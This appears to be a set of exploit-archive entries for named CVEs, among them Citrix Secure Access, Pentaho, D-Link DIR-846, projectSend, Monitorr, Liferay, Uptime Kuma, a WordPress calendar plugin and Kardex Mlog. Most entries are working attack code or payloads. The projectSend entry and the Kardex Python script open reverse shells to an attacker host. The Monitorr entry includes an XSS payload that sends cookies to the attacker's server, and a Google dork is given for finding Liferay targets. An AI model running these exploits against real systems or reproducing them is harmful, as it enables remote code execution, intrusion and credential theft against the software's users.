<pre><code>//Discovered by:: TOUHAMI KASBAOUI - VXREMALWARE<br />//Discover date : 25/03/2023<br />//Reported to Citrix: 25/03/2023<br />//Tested Version: 22.2.1.103, 23.1.1.11/Last version<br />//Exploit: https://github.com/sqrtZeroKnowledge/Citrix_Secure_Access_LPE_0DAY<br /><br /><br />#define UNICODE<br />#define _UNICODE<br />#include <Windows.h><br />#include <string><br />#include <iostream><br />#include <Windows.h><br />#include <iostream><br /><br />using namespace std;<br />enum Result<br />{<br /> unknown,<br /> serviceManager_AccessDenied,<br /> serviceManager_DatabaseDoesNotExist,<br /> service_AccessDenied,<br /> service_InvalidServiceManagerHandle,<br /> service_InvalidServiceName,<br /> service_DoesNotExist,<br /> service_Exist<br />};<br /><br />Result ServiceExists(const std::wstring& serviceName)<br />{<br /> Result r = unknown;<br /><br /> SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);<br /><br /> if (manager == NULL)<br /> {<br /> DWORD lastError = GetLastError();<br /><br /> if (lastError == ERROR_ACCESS_DENIED)<br /> return serviceManager_AccessDenied;<br /> else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)<br /> return serviceManager_DatabaseDoesNotExist;<br /> else<br /> return unknown;<br /> }<br /><br /> SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);<br /><br /> if (service == NULL)<br /> {<br /> DWORD error = GetLastError();<br /><br /> if (error == ERROR_ACCESS_DENIED)<br /> r = service_AccessDenied;<br /> else if (error == ERROR_INVALID_HANDLE)<br /> r = service_InvalidServiceManagerHandle;<br /> else if (error == ERROR_INVALID_NAME)<br /> r = service_InvalidServiceName;<br /> else if (error == ERROR_SERVICE_DOES_NOT_EXIST)<br /> r = service_DoesNotExist;<br /> else<br /> r = unknown;<br /> }<br /> else<br /> r = service_Exist;<br /><br /> if (service != NULL)<br /> CloseServiceHandle(service);<br /><br /> if (manager != NULL)<br /> CloseServiceHandle(manager);<br /><br /> return r;<br />}<br /><br />int main() {<br /><br /> const uint8_t shellcode[7168] = {<br /> 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,<br /> 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br /> }; //You can set array bin of your reverse shell PE file here<br /><br /> std::wstring serviceName = L"aoservice";<br /> Result result = ServiceExists(serviceName);<br /> if (result == service_Exist)<br /> std::wcout << L"The service '" << serviceName << "' exists." << std::endl;<br /> else if (result == service_DoesNotExist)<br /> std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;<br /> else<br /> std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;<br /> <br /> HANDLE fileHandle = CreateFile(L"C:\\Program Files\\Citrix\\Secure Access Client\\ROUTE.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);<br /> cerr << "[*] Loading Malicious file into Citric Secure Access Installer \n";<br /> if (fileHandle == INVALID_HANDLE_VALUE) {<br /> cerr << "Failed to create shellcode\n";<br /> return 1;<br /> }<br /><br /> DWORD bytesWritten;<br /> if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {<br /> cerr << "Failed to write to file\n";<br /> CloseHandle(fileHandle);<br /> return 1;<br /> }<br /> CloseHandle(fileHandle);<br /><br /> cout << "Shellcode exported to Citrix Secure Access path \n";<br /> return 0;<br />}<br /></code></pre>
<pre><code># Title: Pentaho BA Server EE 9.3.0.0-428 - RCE via Server-Side Template Injection (Unauthenticated)<br /># Author: dwbzn<br /># Date: 2022-04-04<br /># Vendor: https://www.hitachivantara.com/<br /># Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html<br /># Version: Pentaho BA Server 9.3.0.0-428<br /># CVE: CVE-2022-43769, CVE-2022-43939<br /># Tested on: Windows 11<br /># Credits: https://research.aurainfosec.io/pentest/pentah0wnage<br /># NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).<br /><br /># Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)<br />import requests<br />import argparse<br /><br />parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')<br />parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')<br />parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)<br />args = parser.parse_args()<br /><br />url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"<br /><br />print ("running...")<br />r = requests.get(url)<br />if r.text == 'false':<br /> print ("command should've executed! nice.")<br />else:<br /> print ("didn't work. sadge...")<br /></code></pre>
<pre><code># Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability <br /># Google Dork: NA<br /># Date: 30/01/2023<br /># Exploit Author: Françoa Taffarel<br /># Vendor Homepage:<br />https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip<br /># Software Link:<br />https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip<br /># Version: DIR846enFW100A53DBR-Retail<br /># Tested on: D-LINK DIR-846<br /># CVE : CVE-2022-46552<br /><br />D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote<br />command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist<br />parameter. This vulnerability is exploited via a crafted POST request.<br /><br />### Malicious POST Request<br />```<br />POST /HNAP1/ HTTP/1.1<br />Host: 192.168.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101<br />Firefox/107.0<br />Accept: application/json<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/json<br />SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"<br />HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285<br />Content-Length: 171<br />Origin: http://192.168.0.1<br />Connection: close<br />Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775<br />Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;<br />PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4<br /><br />{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}<br />```<br /><br /><br />### Response<br /><br />```<br />HTTP/1.1 200 OK<br />X-Powered-By: PHP/7.1.9<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-type: text/html; charset=UTF-8<br />Connection: close<br />Date: Thu, 01 Dec 2022 11:03:54 GMT<br />Server: lighttpd/1.4.35<br />Content-Length: 68<br /><br />{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}<br />```<br /><br /><br />### Data from RCE Request<br /><br />```<br />GET /HNAP1/rce_confirmed HTTP/1.1<br />Host: 192.168.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101<br />Firefox/107.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;<br />PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1<br />Upgrade-Insecure-Requests: 1<br />```<br /><br /><br />### Response<br /><br />```<br />HTTP/1.1 200 OK<br />Content-Type: application/octet-stream<br />Accept-Ranges: bytes<br />Content-Length: 24<br />Connection: close<br />Date: Thu, 01 Dec 2022 23:24:28 GMT<br />Server: lighttpd/1.4.35<br /><br />uid=0(root) gid=0(root)<br />```<br /><br /></code></pre>
<pre><code>Exploit Title: projectSend r1605 - Remote Code Exectution RCE<br />Application: projectSend<br />Version: r1605<br />Bugs: rce via file extension manipulation<br />Technology: PHP<br />Vendor URL: https://www.projectsend.org/<br />Software Link: https://www.projectsend.org/<br />Date of found: 26-01-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br />POC video: https://youtu.be/Ln7KluDfnk4<br /><br />2. Technical Details & POC<br />========================================<br /><br />1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. <br /><br />bash -i >& /dev/tcp/192.168.100.18/4444 0>&1<br /><br />2.Then the attacker starts listening for ip and port <br /> nc -lvp 4444<br /> <br />3.and when uploading file it makes http request as below.file name should be like this openme.sh;jpg<br /><br /><br /><br />POST /includes/upload.process.php HTTP/1.1<br />Host: localhost<br />Content-Length: 525<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-platform: "Linux"<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI<br />Accept: */*<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/upload.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59<br />Connection: close<br /><br />------WebKitFormBoundary0enbZuQQAtahFVjI<br />Content-Disposition: form-data; name="name"<br /><br />openme.sh;jpg<br />------WebKitFormBoundary0enbZuQQAtahFVjI<br />Content-Disposition: form-data; name="chunk"<br /><br />0<br />------WebKitFormBoundary0enbZuQQAtahFVjI<br />Content-Disposition: form-data; name="chunks"<br /><br />1<br />------WebKitFormBoundary0enbZuQQAtahFVjI<br />Content-Disposition: form-data; name="file"; filename="blob"<br />Content-Type: application/octet-stream<br /><br />bash -i >& /dev/tcp/192.168.100.18/4444 0>&1<br /><br />------WebKitFormBoundary0enbZuQQAtahFVjI--<br /><br /><br />4.In the second request, we do this to the filename section at the bottom.<br /><br />openme.sh<br /><br /><br />POST /files-edit.php?ids=34 HTTP/1.1<br />Host: localhost<br />Content-Length: 1016<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/files-edit.php?ids=34&type=new<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59<br />Connection: close<br /><br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="csrf_token"<br /><br />66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02<br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="file[1][id]"<br /><br />34<br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="file[1][original]"<br /><br />openme.sh;.jpg<br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="file[1][file]"<br /><br />1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg<br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="file[1][name]"<br /><br />openme.sh<br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="file[1][description]"<br /><br /><br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="file[1][expiry_date]"<br /><br />25-02-2023<br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="save"<br /><br /><br />------WebKitFormBoundaryc8btjvyb3An7HcmA--<br /><br /><br />And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce<br /><br /><br />private youtube video poc : https://youtu.be/Ln7KluDfnk4<br /><br /></code></pre>
<pre><code># Exploit Title: Monitorr v1.7.6 - Cross Site Scripting<br /># CVE: CVE-2023-26776<br /># Exploit Author: Achuth V P (retrymp3)<br /># Date: February 09, 2023<br /># Vendor Homepage: https://github.com/Monitorr/<br /># Software Link: https://github.com/Monitorr/Monitorr<br /># Tested on: Ubuntu<br /># Version: v1.7.6<br /># Exploit Description: Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.<br /><br />Attacker can create a service configuration at <base-url>/assets/php/post_receiver-services.php with the title of the service being something like; <script>document.location="<your-server>?cookie="document.cookie</script> or just <script>document.cookie</script><br />The injected script tag is executed everytime the home page is loaded.<br /></code></pre>
<pre><code># Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions<br /># Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/<br /># Date: 2021/05<br /># Exploit Author: fu2x2000<br /># Version: Liferay Portal 6.2.5 or later<br /># CVE : CVE-2021-33990<br /><br /> import requests<br />import json<br /><br />print (" Search this on Google #Dork for liferay<br />-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")<br /><br />url ="URL Goes Here<br />/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"<br />req = requests.get(url)<br />print req<br />sta = req.status_code<br />if sta == 200:<br />print ('Life Vulnerability exists')<br />cook = url<br />print cook<br />inject = "Command=FileUpload&Type=File&CurrentFolder=/"<br />#cook_inject = cook+inject<br />#print cook_inject<br />else:<br />print ('not found try a another method')<br /><br /><br />print ("solution restrict access and user groups")<br /> <br /></code></pre>
<pre><code># Exploit Title: Stored XSS in uptime-kuma <= v1.19.6<br /># CVE: CVE-2023-26777<br /># Exploit Author: Achuth V P (retrymp3)<br /># Date: February 09, 2023<br /># Vendor Homepage: https://github.com/louislam/<br /># Software Link: https://github.com/louislam/uptime-kuma<br /># Tested on: Ubuntu<br /># Version: <= v1.19.6<br /># Exploit Description: Stored Cross Site Scripting vulnerability found in Uptime Kuma v.1.19.6 and before, allows a remote attacker to execute arbitrary javascript code via the description, title, footer, and incident creation parameter of the status status page in the application.<br /><br />Create a status page, while giving the title or the discription give the payload: <script>""</script><script>alert("XSS")</script><br />If anyone loads the page, the javascript inside the script tag will be executed.<br /></code></pre>
<pre><code># Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)<br /># Date: 2022-05-25<br /># Exploit Author: Mostafa Farzaneh<br /># WPScan page:<br />https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c<br /># Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/<br /># Software Link:<br />https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip<br /># Version: 1.4.06<br /># Tested on: Linux<br /># CVE : CVE-2022-2846<br /># Description:<br />The Calendar Event Multi View WordPress plugin before 1.4.07 does not have<br />any authorisation and CSRF checks in place when creating an event, and is<br />also lacking sanitisation as well as escaping in some of the event fields.<br />This could allow unauthenticated attackers to create arbitrary events and<br />put Cross-Site Scripting payloads in it.<br /><br />#POC and exploit code:<br />As an unauthenticated user, to add a malicious event (on October 6th, 2022)<br />to the calendar with ID 1, open the code below<br /><br /><html><br /> <body><br /> <form action="<br />https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails"<br />method="POST"><br /> <input type="hidden" name="Subject"<br />value='"><script>alert(/XSS/)</script>' /><br /> <input type="hidden" name="colorvalue" value="#f00" /><br /> <input type="hidden" name="rrule" value="" /><br /> <input type="hidden" name="rruleType" value="" /><br /> <input type="hidden" name="stpartdate" value="10/6/2022" /><br /> <input type="hidden" name="stparttime" value="00:00" /><br /> <input type="hidden" name="etpartdate" value="10/6/2022" /><br /> <input type="hidden" name="etparttime" value="00:00" /><br /> <input type="hidden" name="stpartdatelast" value="10/6/2022" /><br /> <input type="hidden" name="etpartdatelast" value="10/6/2022" /><br /> <input type="hidden" name="stparttimelast" value="" /><br /> <input type="hidden" name="etparttimelast" value="" /><br /> <input type="hidden" name="IsAllDayEvent" value="1" /><br /> <input type="hidden" name="Location" value="CSRF" /><br /> <input type="hidden" name="Description" value='<p style="text-align:<br />left;">CSRF</p>' /><br /> <input type="hidden" name="timezone" value="4.5" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br />The XSS will be triggered when viewing the related event<br /><br /></code></pre>
<pre><code># Exploit Title: Sales Tracker Management System v1.0 - Sensitive information disclosure<br /># CVE: CVE-2023-26774<br /># Exploit Author: Achuth V P (retrymp3)<br /># Date: February 08, 2023<br /># Vendor Homepage: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code<br /># Tested on: Ubuntu, Apache, Mysql<br /># Vendor: oretnom23<br /># Version: v1.0<br /># Exploit Description: An issue found in Sales Tracker Management System v.1.0 allows a remote attacker to access sensitive information via sales.php component of the admin/reports endpoint.<br /><br />Browse to, <application base url>/admin/reports/sales.php<br />you can access the content of sales.php page, which should only be accessed by the admin.<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /><br /># Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)<br /># Date: 12/13/2022<br /># Exploit Author: Patrick Hener<br /># Vendor Homepage: https://www.kardex.com/en/mlog-control-center<br /># Version: 5.7.12+0-a203c2a213-master<br /># Tested on: Windows Server 2016<br /># CVE : CVE-2023-22855<br /># Writeup: https://hesec.de/posts/CVE-2023-22855<br />#<br /># You will need to run a netcat listener beforehand: ncat -lnvp <port><br />#<br />import requests, argparse, base64, os, threading<br />from impacket import smbserver<br /><br />def probe(target):<br /> headers = {<br /> "Accept-Encoding": "deflate"<br /> }<br /> res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers)<br /> if "fonts" in res.text:<br /> return True<br /> else:<br /> return False<br /><br />def gen_payload(lhost, lport):<br /> rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'<br /> rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE'))<br /> payload = f"""<#@ template language="C#" #><br /><#@ Import Namespace="System" #><br /><#@ Import Namespace="System.Diagnostics" #><br /><#<br />var proc1 = new ProcessStartInfo();<br />string anyCommand;<br />anyCommand = "powershell -e {rev_shell_blob_b64.decode()}";<br />proc1.UseShellExecute = true;<br />proc1.WorkingDirectory = @"C:\Windows\System32";<br />proc1.FileName = @"C:\Windows\System32\cmd.exe";<br />proc1.Verb = "runas";<br />proc1.Arguments = "/c "+anyCommand;<br />Process.Start(proc1);<br />#>"""<br /><br /> return payload<br /><br />def start_smb_server(lhost):<br /> server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)<br /> server.addShare("SHARE", os.getcwd(), '')<br /> server.setSMB2Support(True)<br /> server.setSMBChallenge('')<br /> server.start()<br /><br />def trigger_vulnerability(target, lhost):<br /> headers = {<br /> "Accept-Encoding": "deflate"<br /> }<br /><br /> requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers)<br /><br />def main():<br /> # Well, args<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument('-t', '--target', help='Target host url', required=True)<br /> parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True)<br /> parser.add_argument('-p', '--lport', help='Attacker listening port', required=True)<br /> args = parser.parse_args()<br /><br /> # Probe if target is vulnerable<br /> print("[*] Probing target")<br /> if probe(args.target):<br /> print("[+] Target is alive and File Inclusion working")<br /> else:<br /> print("[-] Target is not alive or File Inclusion not working")<br /> exit(-1)<br /><br /> # Write payload to file<br /> print("[*] Writing 'exploit.t4' payload to be included later on")<br /> with open("exploit.t4", 'w') as template:<br /> template.write(gen_payload(args.lhost, args.lport))<br /><br /> template.close()<br /><br /> # Start smb server in background<br /> print("[*] Starting SMB Server in the background")<br /> smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,))<br /> smb_server_thread.start()<br /><br /> # Rev Shell reminder<br /> print("[!] At this point you should have spawned a rev shell listener")<br /> print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'")<br /> print("[?] Are you ready to trigger the vuln? Then press enter!")<br /> input() # Wait for input then continue<br /><br /> # Trigger vulnerability<br /> print("[*] Now triggering the vulnerability")<br /> trigger_vulnerability(args.target, args.lhost)<br /><br /> # Exit<br /> print("[+] Enjoy your shell. Bye!")<br /> os._exit(1)<br /><br /><br /><br />if __name__ == "__main__":<br /> main()<br /> <br /><br /></code></pre>